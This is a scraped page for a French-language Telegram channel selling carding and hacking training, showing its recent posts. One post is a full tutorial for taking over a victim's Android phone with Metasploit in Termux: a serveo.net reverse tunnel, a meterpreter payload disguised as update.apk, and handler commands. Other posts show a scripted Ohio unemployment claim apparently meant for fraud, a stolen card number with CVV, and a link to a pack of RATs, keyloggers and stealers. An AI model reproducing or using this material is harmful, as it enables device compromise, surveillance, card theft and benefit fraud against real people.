Get Mystery Box with random crypto!

Tutoriel et cours de hacking

Logo de la chaîne télégraphique havker488 - Tutoriel et cours de hacking T
Logo de la chaîne télégraphique havker488 - Tutoriel et cours de hacking
Adresse du canal : @havker488
Catégories: Technologies
Langue: Français
Abonnés: 698
Description de la chaîne

☘️Formation en carding et cashout disponible
La meilleure chaîne pour vos besoins tels qu’il soit 👑
Tutoriels gratuits disponibles
🌍Meilleur chaîne de hacKing en Afrique
Meilleur canal d’informatique 🍀

Ratings & Reviews

3.50

2 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

0

3 stars

0

2 stars

1

1 stars

0


Les derniers messages 10

2022-02-27 23:32:35 COMMENT PIRATER ET OBTENIR UN ACCÈS COMPLET SUR L'APPAREIL DE LA VICTIME EN UTILISANT TERMUX

Termux est une application formidable qui nous permet de fais tant de choses très intéressantes

Dans ce Tutoriel, vous apprendrez à pirater les comptes de médias sociaux en utilisant termux et comment obtenir un accès complet sur le téléphone de la victime.


* L'État De La Batterie
* Boîte de réception SMS
* L'Envoi des SMS
* Informations Sur Les Appareils De Téléphonie
* Toast
* Moteur TTS dans Android
* TTS parler
* Vibrer le téléphone
* Info Connexion Wi-Fi
* Wi-Fi Scan Info
* Infos De L'Appareil Photo
* Caméra Photo
* Presse-Papiers
* Liste De Contacts
* Téléchargements des fichiers
* Gestionnaire De Téléchargement
* Emplacement via GPS
* Réseau Mobile ou Wi-Fi
* Notifications
Etc...

Exigences :

Android 5.0 et supérieur
Application Android Termux téléchargeable sur Playstore
Installez le framework Metasploit dans Termux. Je vais vous montrer comment installer Metasploit dans Termux ci-dessous.
Termux devrait être autorisé au stockage externe. (pour cela, entrez cette commande une fois " Termux-setup-storage ” )

Étape 1: Installez Metasploit framework dans Termux pour pirater N'importe quel appareil Android

Installez D'abord Termux, les liens sont donnés ci-dessus.

Ouvrez l'application et attendre pendant qu'il installe ses pilotes.

Tapez cette commande.
apt ugrade && apt update

Puis entrez ou copiez cette commande
apt install curl

Saisissez ou copiez cette syntaxe
curl-LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

Maintenant, donnez la permission en donnant cette commande.
chmod +x metasploit.sh

Maintenant exécuter cette commande.
./metasploit.sh

Et maintenant attendre jusqu'à ce que le traitement et le téléchargement.. il peut prendre jusqu'à 40 min, dépendant du debit de votre conexion internet

Maintenant, vous avez installé avec succès le framework Metasploit.

Étape 2: redirection de port

Ouvrez Termux et tapez la commande ci-dessous. il installera avec succès le SSH ouvert
pkg install openssh

Après cela, tapez la commande ci-dessous et votre séance va commencer.

ssh -R 4564:localhost:4564 serveo.net

Maintenant, la session a commencé avec succès.

Étape 3: Création D'un fichier Apk avec une charge utile intégrée

Tout d'abord tapez la commande ci dessous pour obtenir une application de charge utile et pirater N'importe quel appareil Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT = 4564 R > storage/Download/update.apk

Empalcement du fichier apk : storage/Download/
Nom de l'apk : update.apk

Attendez une minute et vous créez avec succès l'application de charge utile.

Maintenant, L'étape principale envoyer L'application créée à votre victime ou un ami et leur demander d'installer cette application.

Étape 4: configurer Metasploit dans Termux

Activez Metasploit framework dans Termux en entrant cette commande dans une nouvelle session

msfconsole

Maintenant tapez ces commandes chacune après l'autre
pour pirater N'importe quel appareil Android

1. use exploit/multi/handler
2. set payload android/meterpreter/reverse_tcp
3. set LHOST localhost
4. set LPORT 4564
5. exploit -j -z

Bingo ......vous avez réussi à pirater le téléphone de votre victime.

Tapez la commande
help
Pour avoir le catalogue des commande donnant accès au téléphone de la victime avec leur rôle !y’a
7 views20:32
Ouvert / Commentaire
2022-02-27 23:32:33 SCRIPTS TUTORIELS OHIO




Texte d'aide de ma réponse
1.
Au cours de la semaine réclamée, étiez-vous disponible pour travailler?
Oui
2.
Au cours de la semaine réclamée, étiez-vous physiquement et mentalement apte à travailler?
Oui
3.
Au cours de la semaine réclamée, avez-vous effectué deux activités de recherche d'emploi? Si OUI, veuillez énumérer dans l'espace ci-dessous les deux activités réalisées. (rappel: vous devez conserver la confirmation des activités réalisées.)
Oui
Activité de recherche d'emploi terminée
www.simplyhired.com

Lieu de l'activité de recherche d'emploi
www.simplyhired.com


Ville
État de CincinnatiOH

Code postal
45233 -

Veuillez sélectionner la méthode que vous avez utilisée pour terminer l'activité de recherche d'emploi.
l'Internet

Si vous avez postulé pour un poste, veuillez l'indiquer ici. Si vous avez terminé une activité, veuillez expliquer.
Administrations

À quelle date avez-vous terminé cette activité de recherche d'emploi?
24/01/2021

Quel a été le résultat de l'activité de recherche d'emploi?
Interviewé

Activité de recherche d'emploi terminée
OhioJobs Center

Lieu de l'activité de recherche d'emploi
OhioJobs Center


Ville
État de Cincinnati OH

Code postal
45233-

Veuillez sélectionner la méthode que vous avez utilisée pour terminer l'activité de recherche d'emploi.
l'Internet

Si vous avez postulé pour un poste, veuillez l'indiquer ici. Si vous avez terminé une activité, veuillez expliquer.
Administrations

À quelle date avez-vous terminé cette activité de recherche d'emploi?
25/01/2021

Quel a été le résultat de l'activité de recherche d'emploi?
Interviewé
4. Au cours de la semaine réclamée,
a avez-vous refusé de travailler ou une recommandation de travailler? Non
b avez-vous quitté votre emploi? Non
c Avez-vous été congédié (congédié) de votre emploi? Non
5.
Au cours de la semaine demandée, avez-vous demandé ou demandé (ou y a-t-il eu un changement dans le montant de) pension, ou tout autre type de paiement de retraite?
Non
6.
Avez-vous reçu ou recevrez-vous un pécule de vacances pour un jour férié survenu pendant la semaine réclamée?
Non

Si OUI, entrez le montant brut total du pécule de vacances.
Non entré
7.
Avez-vous travaillé (à temps plein ou à temps partiel) ou étiez-vous travailleur autonome pendant la semaine demandée? (Si vous avez travaillé, vous devez répondre OUI même si vous serez payé dans une autre semaine.)
Non
a Si OUI, entrez le montant brut total gagné au cours de la semaine (quel que soit le moment où il est payé). Non entré
b Si vous êtes retourné au travail à temps plein pendant la semaine réclamée, inscrivez la date de retour au travail. Non entré
CERTIFICATION: Je comprends que les réponses que je donne aux questions ci-dessus peuvent affecter mes droits au paiement des prestations. Je certifie que ces déclarations sont vraies et correctes et je ne demande aucune prestation d'aucun autre programme de chômage pour les semaines ci-dessus. Je comprends que la loi prévoit des sanctions pour les fausses déclarations
J'accepte tout ce qui précède et souhaite soumettre ma réclamation pour traitement
Je souhaite modifier une ou plusieurs de mes réponses avant de soumettre ma demande pour traitement
Je n'accepte pas et souhaite annuler ma réclamation.
7 views20:32
Ouvert / Commentaire
2022-02-27 23:32:31 SS AUTH - LIVE
CC: 4122883361413325|03|2026|026
Result: CVV2/CSC Mismatch
Bank Info: BANCO FINANCIERA COMERCIAL HONDURESA, S.A. - -
Card Type: VISA - DEBIT - INFINITE
Country: HONDURAS ( - HNL) - Time: 3.25s
6 views20:32
Ouvert / Commentaire
2022-02-27 23:32:31 Pack de hacking le plus voulu

●Anti Viruses
●BotNets
●Botting Programs (Ad Fly, ETC)
●Brute forcing Programs
●Cracking Programs DDoS
●Programs Deface Creators
●Doxing Tools eWhore Packs
(Fetish) Exploiting Programs (SQL Map, ParanoicScan, Dedi Exploiter, AirCrack)
●Exploit Scanners (GoogleSeacher, Gr3eNox Exploit Scanner, Joomla Security Scanner, Realuike Exploit Scanner, RFI Scanner V2, RFI Tool, Special RFI, SQL Poison, XSS Scanner)
●Exploits (Chat Exploits, MSN Hack, System Exploits, Team Speak)
●Guides (Anonymity, BotNet, Bruteforce, Cracking, DDoSing, Defacing, Doxing, Exploits, Game Hacking, Hacking, IRL Sht, Linux OS, Programming, Random, Reverse Engineering, Security, SQL Injection, Viruses, WiFi Sht)
●Hacking (Ann Loader, Password Stealers)
●Injection Programs (SQL, XSS) MD5 (MD5 Attack, MD5 Toolbox, MD5 Tools)
●Sharecash Skype Tools (Reslovers, CenSky Crasher, Florision Tools, James Reborn(V5.7), Pops Skype Tool, Skype API)
●Source Codes (Crypter Sources, DDoS Programs, KEYLOGGERS, RAT Sources, RANDOM SH*T)
●Tutorials (TOO MANY TO TYPE)
●Viruses (Batch Virus Creators,
Binders, Crypters, DNS, Keyloggers, Ratting, Spoofing, Spreading)
●VPN'S & Proxies
●WiFi Youtube

Free link- http://za.gl/A7JQxGwC
6 views20:32
Ouvert / Commentaire